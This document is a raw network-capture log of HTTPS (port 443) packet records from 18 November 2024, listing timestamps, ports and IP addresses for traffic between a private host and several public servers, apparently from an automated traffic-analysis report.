                                                                                                                                                                                            Nov 18, 2024 21:00:11.843566895 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:11.858843088 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.858902931 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.858923912 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.858954906 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.858963013 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.858980894 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.859003067 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.896868944 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.897118092 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.897212029 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.897391081 CET49842443192.168.2.16151.101.65.140
                                                                                                                                                                                            Nov 18, 2024 21:00:11.897423983 CET44349842151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.902462006 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.929832935 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.929896116 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.929914951 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.929934978 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.929982901 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.930003881 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.930033922 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978164911 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978209019 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978246927 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978276968 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978317022 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978809118 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978827000 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978867054 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978868008 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978887081 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.978939056 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.979752064 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.979769945 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.979823112 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.979844093 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.981374025 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986053944 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986124992 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986146927 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986185074 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986187935 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986222029 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986234903 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986248016 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986248016 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986258984 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986280918 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986330032 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986387014 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986392975 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986665964 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.986730099 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.997091055 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.997091055 CET49840443192.168.2.16172.202.163.200
                                                                                                                                                                                            Nov 18, 2024 21:00:11.997124910 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:11.997140884 CET44349840172.202.163.200192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.030200958 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.030256987 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.030275106 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.030288935 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.030353069 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.030353069 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.046632051 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.046652079 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.046711922 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.046749115 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.047487974 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.047508001 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.047560930 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.047594070 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.048621893 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.048640013 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.048707008 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.048744917 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085472107 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085503101 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085566998 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085618973 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085622072 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085650921 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085681915 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085706949 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085733891 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.085835934 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.086018085 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.086102962 CET49841443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.086136103 CET4434984166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.147396088 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.147489071 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.163446903 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.163533926 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.164272070 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.164366007 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.165271044 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.165368080 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.165404081 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.165487051 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.166218996 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.166276932 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.166311979 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.166379929 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.166479111 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.166507959 CET4434984366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.166533947 CET49843443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:12.456866026 CET44349844188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.457231045 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.457248926 CET44349844188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.458270073 CET44349844188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.458348036 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459436893 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459436893 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459498882 CET44349844188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459508896 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459574938 CET49844443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459830046 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459876060 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.459969044 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.460210085 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:12.460221052 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:12.776392937 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                            Nov 18, 2024 21:00:13.123631001 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.123905897 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.123920918 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.125624895 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.125703096 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.126810074 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.126890898 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.127069950 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.171325922 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.174379110 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.174384117 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.222381115 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.286933899 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.286998034 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287040949 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287050009 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287069082 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287111044 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287113905 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287127972 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287178040 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287182093 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287237883 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287286997 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.287291050 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.334367037 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.334381104 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.382386923 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404149055 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404243946 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404289007 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404295921 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404309034 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404351950 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404357910 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404412985 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404454947 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404515028 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404520035 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.404561043 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.405209064 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.405286074 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.405323029 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.405369043 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.405374050 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.405419111 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.405945063 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406039000 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406106949 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406145096 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406151056 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406156063 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406189919 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406853914 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406922102 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.406924963 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.461359024 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.461373091 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.507375002 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.520762920 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.520854950 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.520895004 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.520916939 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.520922899 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.520967007 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.520972013 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521065950 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521105051 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521109104 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521166086 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521218061 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521222115 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521750927 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521814108 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521817923 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.521976948 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522037029 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522041082 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522079945 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522435904 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522479057 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522495985 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522500038 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.522521019 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.523145914 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.523202896 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.523214102 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.523267984 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.523324966 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.523391008 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.523983955 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.524046898 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.524113894 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.524178028 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.524220943 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.524267912 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.524935961 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.524988890 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.525065899 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.525114059 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.525779963 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.525835991 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.637955904 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638024092 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638034105 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638087034 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638088942 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638104916 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638130903 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638302088 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638348103 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638350964 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638360977 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638390064 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638539076 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638593912 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638601065 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638652086 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638745070 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638792038 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638797998 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638804913 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638839006 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638845921 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638917923 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.638964891 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639126062 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639170885 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639183044 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639187098 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639211893 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639302969 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639353037 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639358044 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639535904 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639586926 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.639591932 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.642942905 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.642999887 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643004894 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643060923 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643068075 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643125057 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643130064 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643207073 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643244028 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643249989 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643258095 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643342972 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643388033 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643390894 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643399954 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643445969 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643455029 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643506050 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643551111 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643554926 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643591881 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643610954 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643660069 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643908978 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643964052 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643965960 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.643976927 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.644004107 CET49845443192.168.2.16188.114.97.3
                                                                                                                                                                                            Nov 18, 2024 21:00:13.644026041 CET44349845188.114.97.3192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:13.644064903 CET49845443192.168.2.16188.114.97.3
